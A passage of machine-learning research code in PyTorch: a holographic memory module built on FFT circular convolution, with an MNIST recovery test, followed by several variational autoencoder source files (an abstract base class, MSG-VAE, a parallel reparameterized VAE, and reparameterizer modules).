batch_size, keys_feature_size = keys.size(0), keys.size(1)
values_feature_size = values.size(1)
required_size = keys_feature_size + values_feature_size - 1
required_size = required_size + 1 if required_size % 2 != 0 else required_size
# conj transpose
keys = Complex(keys).conj().unstack() if conj else keys
# reshape to [batch, [real, imag]]
half = keys.size(-1) // 2
keys = torch.cat([keys[:, 0:half].unsqueeze(2), keys[:, half:].unsqueeze(2)], -1)
values = torch.cat([values[:, 0:half].unsqueeze(2), values[:, half:].unsqueeze(2)], -1)
# do the fft, ifft and return num_required
kf = torch.fft(keys, signal_ndim=1, normalized=normalized)
vf = torch.fft(values, signal_ndim=1, normalized=normalized)
kvif = torch.ifft(kf*vf, signal_ndim=1, normalized=normalized)#[:, 0:required_size]
# if conj:
# return Complex(kvif[:, :, 1], kvif[:, :, 0]).unstack()
#return Complex(kvif[:, :, 0], kvif[:, :, 1]).abs() if not conj \
# return Complex(kvif[:, :, 0], kvif[:, :, 1]).unstack() # if not conj \
# else Complex(kvif[:, :, 1], kvif[:, :, 0]).abs()
return Complex(kvif[:, :, 0], kvif[:, :, 1]).unstack().view(batch_size, -1)
class HolographicMemory(nn.Module):
def __init__(self, num_init_memories, normalization='complex', cuda=True):
super(HolographicMemory, self).__init__()
self.perms, self.inv_perms, self.memories = None, None, None
self.num_memories = num_init_memories
self.complex_normalize = normalization == 'complex'
self.l2_normalize = normalization == 'l2'
self.conv_fn = circular_convolution_fft
self.cuda = cuda
@staticmethod
def _generate_perms_and_inverses(feature_size, num_perms):
perms = [torch.randperm(feature_size)
for _ in range(num_perms)]
inv_perms = [torch.cat([(perm == i).nonzero()
for i in range(feature_size)], 0).squeeze()
for perm in perms]
return perms, inv_perms
def normalize(self, arr):
if self.complex_normalize:
return self._complex_normalize(arr)
return F.normalize(arr, dim=-1)
def _complex_normalize(self, arr):
assert arr.size(-1) % 2 == 0, "dim[-1] need to be divisible by 2"
half = arr.size(-1) // 2
cplx = Complex(arr[:, 0:half], arr[:, half:]).abs()
mag = torch.max(cplx, torch.ones_like(cplx))
return arr / torch.cat([mag, mag], -1)
def encode(self, keys, values):
'''
Encoders some keys and values together
values: [batch_size, feature_size]
keys: [batch_size, feature_size]
sets memories: [num_memories, features]
'''
assert values.dim() == keys.dim() == 2, "only operate over 2 dims"
batch_size, feature_size = list(values.size())
if self.perms is None:
''' initial generation of random perms '''
self.perms, self.inv_perms = self._generate_perms_and_inverses(
feature_size, self.num_memories
)
keys = self.normalize(keys)
permed_keys = torch.cat([keys[:, perm] for perm in self.perms], 0)
conv_output = self.conv_fn(permed_keys,
values.repeat([self.num_memories, 1]),
cuda=self.cuda)
self.memories = self.memories + conv_output if self.memories is not None else conv_output
def extend_memory(self, batch_size, feature_size, num_to_extend):
if num_to_extend < 1:
return
new_perms, new_inv_perms = self._generate_perms_and_inverses(
feature_size, num_to_extend
)
self.perms.extend(new_perms)
self.inv_perms.extend(new_inv_perms)
if self.memories is not None:
zero_vectors = float_type(self.cuda)(batch_size*num_to_extend, feature_size).zero_()
self.memories = torch.cat([self.memories, zero_vectors], 0)
self.num_memories += num_to_extend
def decode(self, keys):
'''
Decoders values out of memories
keys: [batch_size, feature_size]
returns: [batch, features]
'''
keys = self.normalize(keys)
batch_size = keys.size(0)
# re-gather keys to avoid mixing between different keys.
permed_keys = torch.cat([keys[:, perm] for perm in self.perms], 0)
unsplit_conv = self.conv_fn(permed_keys, self.memories, conj=False, cuda=self.cuda)
indices = [[i for i in range(j, self.num_memories*batch_size, batch_size)]
for j in range(batch_size)]
return torch.cat([torch.sum(unsplit_conv[ind], 0) for ind in indices], 0)
if __name__ == "__main__":
# simple test on MNIST recovery
import argparse
import torchvision
from torchvision import datasets, transforms
parser = argparse.ArgumentParser(description='HolographicMemory MNIST Recovery')
# Task parameters
parser.add_argument('--key-type', type=str, default='gaussian',
help="type of key: gaussian or onehot (default: gaussian)")
parser.add_argument('--batch-size', type=int, default=10,
help="batch size (default: 10)")
parser.add_argument('--batches-to-encode', type=int, default=10,
help="how many minibatches to encode (default: 10)")
parser.add_argument('--num-memories', type=int, default=10,
help="number of memory traces (default: 10)")
parser.add_argument('--increment-memories-per-batch', type=int, default=0,
help="number of memory traces to increase per batch (default: 0)")
parser.add_argument('--no-cuda', action='store_true', default=False,
help='disables CUDA training')
args = parser.parse_args()
args.cuda = not args.no_cuda and torch.cuda.is_available()
feature_size = 784
mnist = torch.utils.data.DataLoader(
datasets.MNIST('.datasets', train=True, download=True, transform=transforms.ToTensor()),
batch_size=args.batch_size,
drop_last=True,
shuffle=True,
)
# build memory and some random keys
memory = HolographicMemory(num_init_memories=args.num_memories,
normalization='complex', cuda=args.cuda)
if args.key_type == 'gaussian':
keys = [torch.randn(args.batch_size, feature_size)
for _ in range(args.batches_to_encode)]
else:
rv = torch.distributions.OneHotCategorical(probs=torch.rand(args.batch_size, feature_size))
keys = [rv.sample() for _ in range(args.batches_to_encode)]
if args.cuda:
keys = [k.cuda() for k in keys]
# encode some images
img_container, key_container = [], []
for i, (img, lbl) in enumerate(mnist):
if i > args.batches_to_encode - 1:
break
img, lbl = img.cuda() if args.cuda else img, lbl.cuda() if args.cuda else lbl
img_container.append(img)
memory.encode(keys[i], img.view(args.batch_size, -1))
# lbl = lbl.unsqueeze(1) if lbl.dim() < 2 else lbl
# key_container.append(one_hot(feature_size, lbl, True).type(float_type(True)))
# print(img.size(), lbl.size(), key_container[-1].size())
# memory.encode(key_container[-1], img.view(args.batch_size, -1))
# expand_mem if requested
memory.extend_memory(args.batch_size, feature_size, args.increment_memories_per_batch)
img_container = torch.cat(img_container, 0)
# keys = torch.cat(key_container, 0)
# print("key container post = ", keys.size())
print("encoded {} samples x {} --> {}".format(
args.batch_size, list(img.size()), list(memory.memories.size())))
# try to decode
values = torch.cat([memory.decode(key) for key in keys], 0)
print("decoded {} keys --> {}".format(
list(torch.cat(keys, 0).size()), values.size()))
# save image for visualization
grid = torchvision.utils.make_grid(
torch.cat([img_container, values.view(-1, 1, 28, 28)], 0),
nrow=args.batch_size, normalize=True, scale_each=True
)
def show(img):
import matplotlib.pyplot as plt
npimg = img.cpu().numpy()
plt.imshow(np.transpose(npimg, (1,2,0)), interpolation='nearest')
plt.show()
show(grid)
``` |
{
"source": "jramapuram/vae",
"score": 3
} |
#### File: jramapuram/vae/abstract_vae.py
```python
from __future__ import print_function
import tree
import numpy as np
import torch
import torch.nn as nn
from copy import deepcopy
from torch.autograd import Variable
from collections import OrderedDict
import helpers.utils as utils
import helpers.layers as layers
import helpers.distributions as distributions
class VarianceProjector(nn.Module):
def __init__(self, nll_type_str):
""" A single scalar (learnable) variance.
:param nll_type_str: string describing negative log-likelihood type.
:returns: object
:rtype: object
"""
super(VarianceProjector, self).__init__()
# build the sequential layer
if distributions.nll_has_variance(nll_type_str):
self.register_parameter(
"variance_scalar",
nn.Parameter(torch.zeros(1))
)
def forward(self, x):
if hasattr(self, 'variance_scalar'):
return torch.cat([x, self.variance_scalar.expand_as(x)], 1)
return x
class AbstractVAE(nn.Module):
def __init__(self, input_shape, **kwargs):
""" Abstract base class for VAE.
:param input_shape: the input tensor shape
:returns: instantiation of object
:rtype: object
"""
super(AbstractVAE, self).__init__()
self.input_shape = input_shape
self.is_color = input_shape[0] > 1
self.chans = 3 if self.is_color else 1
self.config = kwargs['kwargs']
# keep track of ammortized posterior
self.aggregate_posterior = layers.EMA(self.config['aggregate_posterior_ema_decay'])
# Setup the cyclic annealing object if required.
self.kl_annealer = self.build_kl_annealer()
def get_reparameterizer_scalars(self):
""" return the reparameterization scalars (eg: tau in gumbel)
:returns: a dict of scalars
:rtype: dict
"""
return self.reparameterizer.get_reparameterizer_scalars()
def build_kl_annealer(self):
"""Helper to build a KL annealer (if requred in argparse)."""
kl_annealer = None
klc = self.config['kl_annealing_cycles']
if klc is not None and klc > 0:
ten_percent_of_epochs_as_steps = int(self.config['epochs'] * 0.1) * self.config['steps_per_train_epoch']
total_cycles = self.config['total_train_steps'] / self.config['kl_annealing_cycles']
# print("steps_per_epoch = {} | total_steps = {} | total_cycles = {} | 10% steps = {}".format(
# self.config['steps_per_epoch'],
# self.config['total_steps'],
# total_cycles, ten_percent_of_epochs_as_steps))
# Linear warmup with fixed rate; generally performs worse than cosine-annealing below.
# self.kl_annealer = layers.LinearWarmupWithFixedInterval(
# fixed_steps=int(np.ceil((total_cycles + 1) * 0.3)), # Use 90% for base kl-beta
# warmup_steps=int(np.floor((total_cycles + 1) * 0.7)) # Use 10% for linear warmup
# )
kl_annealer = layers.LinearWarmupWithCosineAnnealing(
decay_steps=int(total_cycles * 0.9), # Use 90% for cos-anneal.
warmup_steps=int(total_cycles * 0.1), # Use 10% for linear warmup.
total_steps=self.config['total_train_steps'], # Total steps for model.
constant_for_last_k_steps=ten_percent_of_epochs_as_steps # Constant steps at end.
)
print("\nKL-Annealer: {}\n".format(kl_annealer))
return kl_annealer
def build_encoder(self):
""" helper to build the encoder type
:returns: an encoder
:rtype: nn.Module
"""
encoder = layers.get_encoder(**self.config)(
output_size=self.reparameterizer.input_size
)
print('encoder has {} parameters\n'.format(utils.number_of_parameters(encoder) / 1e6))
return torch.jit.script(encoder) if self.config['jit'] else encoder
def build_decoder(self, reupsample=True):
""" helper function to build convolutional or dense decoder
:returns: a decoder
:rtype: nn.Module
"""
dec_conf = deepcopy(self.config)
if dec_conf['nll_type'] == 'pixel_wise':
dec_conf['input_shape'][0] *= 256
decoder = layers.get_decoder(output_shape=dec_conf['input_shape'], **dec_conf)(
input_size=self.reparameterizer.output_size
)
print('decoder has {} parameters\n'.format(utils.number_of_parameters(decoder) / 1e6))
# append the variance as necessary
decoder = self._append_variance_projection(decoder)
return torch.jit.script(decoder) if self.config['jit'] else decoder
def _append_variance_projection(self, decoder):
""" Appends a decoder variance for gaussian, etc.
:param decoder: the nn.Module
:returns: appended variance projector to decoder
:rtype: nn.Module
"""
if distributions.nll_has_variance(self.config['nll_type']):
# add the variance projector (if we are in that case for the NLL)
# warnings.warn("\nCurrently variance is not being added to p(x|z)\ --> using mean. \n")
print("adding variance projector for {} log-likelihood".format(self.config['nll_type']))
decoder = nn.Sequential(
decoder,
VarianceProjector(self.config['nll_type'])
)
return decoder
def compile_full_model(self):
""" Takes all the submodules and module-lists
and returns one gigantic sequential_model
:returns: None
:rtype: None
"""
full_model_list, _ = layers.flatten_layers(self)
return nn.Sequential(OrderedDict(full_model_list))
def reparameterize_aggregate_posterior(self):
""" Gets reparameterized aggregate posterior samples
:returns: reparameterized tensor
:rtype: torch.Tensor
"""
training_tmp = self.reparameterizer.training
self.reparameterizer.train(True)
enumerated_labels = torch.arange(
self.config['output_size'], device='cuda:0' if self.config['cuda'] else 'cpu')
z_samples, _ = self.reparameterize(self.aggregate_posterior.ema_val, labels=enumerated_labels)
self.reparameterizer.train(training_tmp)
return z_samples
def generate_synthetic_samples(self, batch_size, **kwargs):
""" Generates samples with VAE.
:param batch_size: the number of samples to generate.
:returns: decoded logits
:rtype: torch.Tensor
"""
def generate_single_batch(batch_size):
if kwargs.get('use_aggregate_posterior', False):
z_samples = self.reparameterize_aggregate_posterior()
else:
z_samples = self.reparameterizer.prior(
batch_size, scale_var=self.config['generative_scale_var'], **kwargs
)
# in the normal case just decode and activate
return self.nll_activation(self.decode(z_samples))
full_generations, num_generated = [], 0
def detach_to_cpu(t): return t.detach().cpu() # move the tensor to cpu memory
while num_generated < batch_size:
gen = tree.map_structure(
detach_to_cpu, generate_single_batch(self.config['batch_size']))
full_generations.append(gen)
num_generated += gen.shape[0] # add number generated
def reduce_to_requested(t): return t[-batch_size:]
return tree.map_structure(reduce_to_requested, full_generations)
def generate_synthetic_sequential_samples(self, num_original_discrete, num_rows=8):
""" Iterates over all discrete positions and generates samples (for mix or disc only).
:param num_original_discrete: The original discrete size (useful for LLVAE).
:param num_rows: for visdom
:returns: decoded logits
:rtype: torch.Tensor
"""
assert self.has_discrete()
# create a grid of one-hot vectors for displaying in visdom
# uses one row for original dimension of discrete component
discrete_indices = np.array([np.random.randint(begin, end, size=num_rows) for begin, end in
zip(range(0, self.reparameterizer.config['discrete_size'],
num_original_discrete),
range(num_original_discrete,
self.reparameterizer.config['discrete_size'] + 1,
num_original_discrete))])
discrete_indices = discrete_indices.reshape(-1)
self.eval() # lock BN / Dropout, etc
with torch.no_grad():
z_samples = Variable(
torch.from_numpy(utils.one_hot_np(self.reparameterizer.config['discrete_size'],
discrete_indices))
)
z_samples = z_samples.type(utils.same_type(self.config['half'], self.config['cuda']))
if self.config['reparam_type'] == 'mixture' and self.config['vae_type'] != 'sequential':
''' add in the gaussian prior '''
z_cont = self.reparameterizer.continuous.prior(z_samples.size(0))
z_samples = torch.cat([z_cont, z_samples], dim=-1)
# the below is to handle the issues with BN
# pad the z to be full batch size
number_to_return = z_samples.shape[0] # original generate number
number_batches_z = int(max(1, np.ceil(
float(self.config['batch_size']) / float(number_to_return))))
z_padded = torch.cat(
[z_samples for _ in range(number_batches_z)], 0
)[0:self.config['batch_size']]
# generate and return the requested number
number_batches_to_generate = int(max(1, np.ceil(
float(number_to_return) / float(self.config['batch_size']))))
generated = torch.cat([self.generate_synthetic_samples(
self.config['batch_size'], z_samples=z_padded
) for _ in range(number_batches_to_generate)], 0)
return generated[0:number_to_return] # only return num_requested
def nll_activation(self, logits):
""" Activates the logits
:param logits: the unactivated logits
:returns: activated logits.
:rtype: torch.Tensor
"""
return distributions.nll_activation(logits,
self.config['nll_type'],
chans=self.chans)
def forward(self, x, labels=None):
"""Accepts input (and optionally labels), gets posterior and latent and decodes.
:param x: input tensor.
:param labels: (optional) labels
:returns: decoded logits and reparam dict
:rtype: torch.Tensor, dict
"""
z, params = self.posterior(x, labels=labels)
decoded_logits = self.decode(z)
params = self._compute_mi_params(decoded_logits, params)
return decoded_logits, params
def likelihood(self, loader, K=1000):
""" Likelihood by integrating ELBO.
TODO(jramapuram): move loader out.
:param loader: the data loader to iterate over.
:param K: number of importance samples.
:returns: likelihood produced by monte-carlo integration of elbo.
:rtype: float32
"""
with torch.no_grad():
likelihood = []
for num_minibatches, (minibatch, labels) in enumerate(loader):
minibatch, labels = [minibatch.cuda() if self.config['cuda'] else minibatch,
labels.cuda() if self.config['cuda'] else minibatch]
z_logits = self.encode(minibatch) # we only need to encode once
batch_size = z_logits.shape[0]
for idx in range(batch_size):
z_logits_i = z_logits[idx].expand_as(z_logits).contiguous()
sample_i = minibatch[idx].expand_as(minibatch).contiguous()
label_i = labels[idx].expand_as(labels).contiguous()
elbo = []
for count in range(K // batch_size):
z, params = self.reparameterize(z_logits_i, labels=label_i)
decoded_logits = self.decode(z)
loss_t = self.loss_function(decoded_logits, sample_i, params=params)
elbo.append(loss_t['elbo'])
# compute the log-sum-exp of the elbo of the single sample taken over K replications
multi_sample_elbo = torch.cat([e.unsqueeze(0) for e in elbo], 0).view([-1])
likelihood.append(torch.logsumexp(multi_sample_elbo, dim=0) - np.log(count + 1))
return torch.mean(torch.cat([l.unsqueeze(0) for l in likelihood], 0))
def compute_kl_beta(self, kl_beta_list):
"""Compute the KL-beta term using an annealer or just returns.
:param kl_beta_list: a list of kl-beta values to scale
:returns: scalar float32
:rtype: float32
"""
if self.kl_annealer is not None:
kl_beta_list = self.kl_annealer(kl_beta_list)
return kl_beta_list
def loss_function(self, recon_x, x, params, K=1, **extra_loss_terms):
""" Produces ELBO.
:param recon_x: the unactivated reconstruction preds.
:param x: input tensor.
:param params: the dict of reparameterization.
:param K: number of monte-carlo samples to use.
:param extra_loss_terms: kwargs of extra [B] dimensional losses
:returns: loss dict
:rtype: dict
"""
nll = self.nll(x, recon_x, self.config['nll_type'])
# multiple monte-carlo samples for the decoder.
if self.training:
for k in range(1, K):
z_k, params_k = self.reparameterize(logits=params['logits'],
labels=params.get('labels', None))
recon_x_i = self.decode(z_k)
nll = nll + self.nll(x, recon_x_i, self.config['nll_type'])
nll = nll / K
kld = self.kld(params)
elbo = nll + kld # save the base ELBO, but use the beta-vae elbo for the full loss
# handle the mutual information term
mut_info = self.mut_info(params, x.size(0))
# get the kl-beta from the annealer or just set to fixed value
kl_beta = self.compute_kl_beta([self.config['kl_beta']])[0]
# sanity checks only dont in fp32 due to too much fp16 magic
if not self.config['half']:
utils.nan_check_and_break(nll, "nll")
if kl_beta > 0: # only check if we have a KLD
utils.nan_check_and_break(kld, "kld")
# if we are provided additional losses add them together
additional_losses = torch.sum(
torch.cat([v.unsqueeze(0) for v in extra_loss_terms.values()], 0), 0) \
if extra_loss_terms else torch.zeros_like(nll)
# compute full loss to use for optimization
loss = (nll + additional_losses + kl_beta * kld) - mut_info
return {
'loss': loss,
'elbo': elbo,
'loss_mean': torch.mean(loss),
'elbo_mean': torch.mean(elbo),
'nll_mean': torch.mean(nll),
'kld_mean': torch.mean(kld),
'additional_loss_mean': torch.mean(additional_losses),
'kl_beta_scalar': kl_beta,
'mut_info_mean': torch.mean(mut_info)
}
def has_discrete(self):
""" returns True if the model has a discrete
as it's first (in the case of parallel) reparameterizer
:returns: True/False
:rtype: bool
"""
return self.reparameterizer.is_discrete
def reparameterize(self, logits, labels=None, force=False):
""" Reparameterize the logits and returns a dict.
:param logits: unactivated encoded logits.
:param labels: (optional) labels
:param force: force reparameterize the distributions
:returns: reparam dict
:rtype: dict
"""
return self.reparameterizer(logits, force=force)
def decode(self, z):
""" Decode a latent z back to x.
:param z: the latent tensor.
:returns: decoded logits (unactivated).
:rtype: torch.Tensor
"""
decoded_logits = self.decoder(z.contiguous())
return decoded_logits
def posterior(self, x, labels=None, force=False):
""" get a reparameterized Q(z|x) for a given x
:param x: input tensor
:param labels: (optional) labels
:param force: force reparameterization
:returns: reparam dict
:rtype: torch.Tensor
"""
z_logits = self.encode(x) # encode logits
self.aggregate_posterior(z_logits) # aggregate posterior EMA
return self.reparameterize(z_logits, labels=labels, force=force) # return reparameterized value
def encode(self, x):
""" Encodes a tensor x to a set of logits.
:param x: the input tensor
:returns: logits
:rtype: torch.Tensor
"""
encoded = self.encoder(x).squeeze()
if encoded.dim() < 2:
return encoded.unsqueeze(-1)
return encoded
def kld(self, dist_a):
""" KL-Divergence of the distribution dict and the prior of that distribution.
:param dist_a: the distribution dict.
:returns: tensor that is of dimension batch_size
:rtype: torch.Tensor
"""
return self.reparameterizer.kl(dist_a)
def nll(self, x, recon_x, nll_type):
""" Grab the negative log-likelihood for a specific NLL type
:param x: the true tensor
:param recon_x: the reconstruction tensor
:param nll_type: the NLL type (str)
:returns: [B] dimensional tensor
:rtype: torch.Tensor
"""
return distributions.nll(x, recon_x, nll_type)
def _clamp_mut_info(self, mut_info):
""" helper to clamp the mutual information according to a predefined strategy
:param mut_info: the tensor of mut-info
:returns: clamped mut-info
:rtype: torch.Tensor
"""
mut_clamp_strategy_map = { # Clamping strategies
'none': lambda mut_info: mut_info,
'norm': lambda mut_info: mut_info / torch.norm(mut_info, p=2),
'clamp': lambda mut_info: torch.clamp(mut_info,
min=-self.config['mut_clamp_value'],
max=self.config['mut_clamp_value'])
}
return mut_clamp_strategy_map[self.config['mut_clamp_strategy'].strip().lower()](mut_info)
def _compute_mi_params(self, recon_x_logits, params):
""" Internal helper to compute the MI params and append to full params
:param recon_x: reconstruction
:param params: the original params
:returns: original params OR param + MI_params
:rtype: dict
"""
if self.config.get('continuous_mut_info', 0) > 0 or self.config.get('discrete_mut_info', 0) > 0:
_, q_z_given_xhat_params = self.posterior(self.nll_activation(recon_x_logits))
return {**params, 'q_z_given_xhat': q_z_given_xhat_params}
# base case, no MI
return params
def mut_info(self, dist_params, batch_size):
""" Returns mutual information between z <-> x
:param dist_params: the distribution dict
:returns: tensor of dimension batch_size
:rtype: torch.Tensor
"""
mut_info = utils.same_type(self.config['half'], self.config['cuda'])(batch_size).zero_()
# only grab the mut-info if the scalars above are set
if self.config.get('continuous_mut_info', 0) > 0 or self.config.get('discrete_mut_info', 0) > 0:
mut_info = self._clamp_mut_info(self.reparameterizer.mutual_info(dist_params))
return mut_info
def get_activated_reconstructions(self, reconstr):
""" Returns activated reconstruction
:param reconstr: unactivated reconstr logits
:returns: activated reconstr
:rtype: torch.Tensor
"""
return {'reconstruction_imgs': self.nll_activation(reconstr)}
```
#### File: jramapuram/vae/msg.py
```python
from __future__ import print_function
import torch
import torch.nn as nn
from .reparameterizers import get_reparameterizer
from .abstract_vae import AbstractVAE
class MSGVAE(AbstractVAE):
def __init__(self, input_shape, **kwargs):
""" Implements a VAE which decodes many samples and averages outputs.
:param input_shape: the input shape
:returns: an object of MSG-VAE
:rtype: MSGVAE
"""
super(MSGVAE, self).__init__(input_shape, **kwargs)
self.reparameterizer = get_reparameterizer(self.config['reparam_type'])(config=self.config)
# build the encoder and decoder
self.encoder = self.build_encoder()
self.decoder = self.build_decoder()
# build the gates
self.gates = nn.ModuleList([self.build_decoder() for i in range(self.config['max_time_steps'])])
# over-ride the reparam prior
self.single_prior = self.reparameterizer.prior
self.reparameterizer.prior = self._prior_override
def _prior_override(self, batch_size, **kwargs):
""" Helper to generate many samples from the true prior
:param batch_size: the batch size to generate samples for
:returns: a list of priors
:rtype: [torch.Tensor]
"""
return [self.single_prior(batch_size, **kwargs) for _ in range(self.config['max_time_steps'])]
def kld(self, dist_list):
""" KL-Divergence of the distribution dict and the prior of that distribution.
NOTE: we use the last one because we calculate the analytical KL divergence
which only necessisitates the parameters of the distribution.
:param dist_list: the list of distributions.
:returns: tensor that is of dimension batch_size
:rtype: torch.Tensor
"""
return self.reparameterizer.kl(dist_list[-1])
def reparameterize(self, logits, force=False):
""" Reparameterize the logits and returns a dict.
:param logits: unactivated encoded logits.
:returns: reparam dict
:rtype: dict
"""
z_list, params_list = [], []
for _ in range(self.config['max_time_steps']):
z, params = self.reparameterizer(logits, force=force)
z_list.append(z)
params_list.append(params)
return z_list, params_list
def decode(self, z, x=None):
""" Decode a set of latent z back to x_mean.
:param z: the latent tensor.
:returns: decoded logits (unactivated).
:rtype: torch.Tensor
"""
assert isinstance(z, (list, tuple)), "expecting a tuple or list"
if self.training:
gate_encodes = [torch.sigmoid(g(z_i)) for g, z_i in zip(self.gates, z)]
return torch.mean(torch.cat([(g_i * self.decoder(z_i.contiguous())).unsqueeze(0)
for z_i, g_i in zip(z, gate_encodes)], 0), 0)
# At inference just return a single sample
# return torch.sigmoid(self.gates[0](z[0])) * self.decoder(z[0].contiguous())
return self.decoder(z[0].contiguous())
```
#### File: jramapuram/vae/parallelly_reparameterized_vae.py
```python
from __future__ import print_function
from .abstract_vae import AbstractVAE
from .reparameterizers.concat_reparameterizer import ConcatReparameterizer
class ParallellyReparameterizedVAE(AbstractVAE):
def __init__(self, input_shape, reparameterizer_strs=["bernoulli", "isotropic_gaussian"], **kwargs):
""" Implements a parallel (in the case of mixture-reparam) VAE
:param input_shape: the input shape
:returns: an object of AbstractVAE
:rtype: AbstractVAE
"""
super(ParallellyReparameterizedVAE, self).__init__(input_shape, **kwargs)
self.reparameterizer_strs = reparameterizer_strs
self.reparameterizer = ConcatReparameterizer(reparameterizer_strs, self.config)
# build the encoder and decoder here because of sizing
self.encoder = self.build_encoder()
self.decoder = self.build_decoder()
def _compute_mi_params(self, recon_x_logits, params_list):
""" Internal helper to compute the MI params and append to full params
:param recon_x: reconstruction
:param params: the original params
:returns: original params OR param + MI_params
:rtype: dict
"""
if self.config['continuous_mut_info'] > 0 or self.config['discrete_mut_info'] > 0:
_, q_z_given_xhat_params_list = self.posterior(self.nll_activation(recon_x_logits))
for param, q_z_given_xhat in zip(params_list, q_z_given_xhat_params_list):
param['q_z_given_xhat'] = q_z_given_xhat
return params_list
# base case, no MI
return params_list
```
#### File: vae/reparameterizers/__init__.py
```python
from .beta import Beta
from .mixture import Mixture
from .bernoulli import Bernoulli
from .gumbel import GumbelSoftmax
from .isotropic_gaussian import IsotropicGaussian
from .concat_reparameterizer import ConcatReparameterizer
from .sequential_reparameterizer import SequentialReparameterizer
from .flow import FlowReparameterizer
reparam_dict = {
'flow': FlowReparameterizer,
'beta': Beta,
'bernoulli': Bernoulli,
'discrete': GumbelSoftmax,
'isotropic_gaussian': IsotropicGaussian,
'mixture': Mixture,
'concat': ConcatReparameterizer,
'sequential': SequentialReparameterizer
}
def get_reparameterizer(reparam_type_str):
""" Returns a reparameterizer type based on the string
:param reparam_type_str: the type of reparam
:returns: a reparam object
:rtype: nn.Module
"""
assert reparam_type_str in reparam_dict, "Unknown reparameterizer requested: {}".format(
reparam_type_str)
return reparam_dict[reparam_type_str]
def is_module_a_reparameterizer(module):
"""Returns true if the provided torch module is a reparamterizer
:param module: nn.Module, etc.
:returns: true or false
:rtype: bool
"""
module_types = tuple(reparam_dict.values())
return isinstance(module, module_types)
```
#### File: vae/reparameterizers/mixture.py
```python
from __future__ import print_function
import warnings
import torch
import torch.nn as nn
from helpers.utils import nan_check_and_break
from .beta import Beta
from .gumbel import GumbelSoftmax
from .isotropic_gaussian import IsotropicGaussian
class Mixture(nn.Module):
''' continuous + discrete reparaterization '''
def __init__(self, config, is_beta=False):
super(Mixture, self).__init__()
warnings.warn("\n\nMixture is depricated, use concat_reparam or sequential_reparam.\n")
self.config = config
self.is_beta = is_beta
self.is_discrete = True
self.num_discrete_input = self.config['discrete_size']
self.num_continuous_input = self.config['continuous_size']
# setup the continuous & discrete reparameterizer
self.continuous = IsotropicGaussian(config) if not is_beta else Beta(config)
self.discrete = GumbelSoftmax(config)
self.input_size = self.num_continuous + self.num_discrete
self.output_size = self.discrete.output_size + self.continuous.output_size
def get_reparameterizer_scalars(self):
""" Returns any scalars used in reparameterization.
:returns: dict of scalars
:rtype: dict
"""
return self.discrete.get_reparameterizer_scalars()
def prior_params(self, batch_size, **kwargs):
""" Helper to get prior parameters
:param batch_size: the size of the batch
:returns: a dictionary of parameters
:rtype: dict
"""
cont_params = self.continuous.prior_params(batch_size, **kwargs)
disc_params = self.discrete.prior_params(batch_size, **kwargs)
return {
**disc_params,
**cont_params
}
def prior_distribution(self, batch_size, **kwargs):
""" get a torch distrbiution prior
:param batch_size: size of the prior
:returns: uniform categorical
:rtype: torch.distribution
"""
disc_dist = self.discrete.prior_distribution(batch_size, **kwargs)
cont_dist = self.continuous.prior_distribution(batch_size, **kwargs)
return {
'continuous': cont_dist,
'discrete': disc_dist
}
def prior(self, batch_size, **kwargs):
disc = self.discrete.prior(batch_size, **kwargs)
cont = self.continuous.prior(batch_size, **kwargs)
return torch.cat([cont, disc], 1)
def mutual_info(self, params):
dinfo = self.discrete.mutual_info(params)
cinfo = self.continuous.mutual_info(params)
return dinfo - cinfo
def log_likelihood(self, z, params):
cont = self.continuous.log_likelihood(z[:, 0:self.continuous.output_size], params)
disc = self.discrete.log_likelihood(z[:, self.continuous.output_size:], params)
if disc.dim() < 2:
disc = disc.unsqueeze(-1)
# sanity check and return
nan_check_and_break(cont, 'cont_ll')
nan_check_and_break(disc, 'disc_ll')
return torch.cat([cont, disc], 1)
def reparmeterize(self, logits, force=False):
continuous_logits = logits[:, 0:self.num_continuous_input]
discrete_logits = logits[:, self.num_continuous_input:]
continuous_reparam, continuous_params = self.continuous(continuous_logits, force=force)
discrete_reparam, disc_params = self.discrete(discrete_logits, force=force)
merged = torch.cat([continuous_reparam, discrete_reparam], -1)
# use a separate key for gaussian or beta
continuous_value = continuous_params['gaussian'] if not self.is_beta else continuous_params['beta']
continuous_key = 'gaussian' if not self.is_beta else 'beta'
params = {continuous_key: continuous_value,
'discrete': disc_params['discrete'],
'logits': logits,
'z': merged}
return merged, params
def kl(self, dist_a, prior=None):
continuous_kl = self.continuous.kl(dist_a, prior)
disc_kl = self.discrete.kl(dist_a, prior)
assert continuous_kl.shape == disc_kl.shape, "need to reduce kl to [#batch] before mixture"
return continuous_kl + disc_kl
def forward(self, logits, force=False):
return self.reparmeterize(logits, force=force)
``` |
Subsets and Splits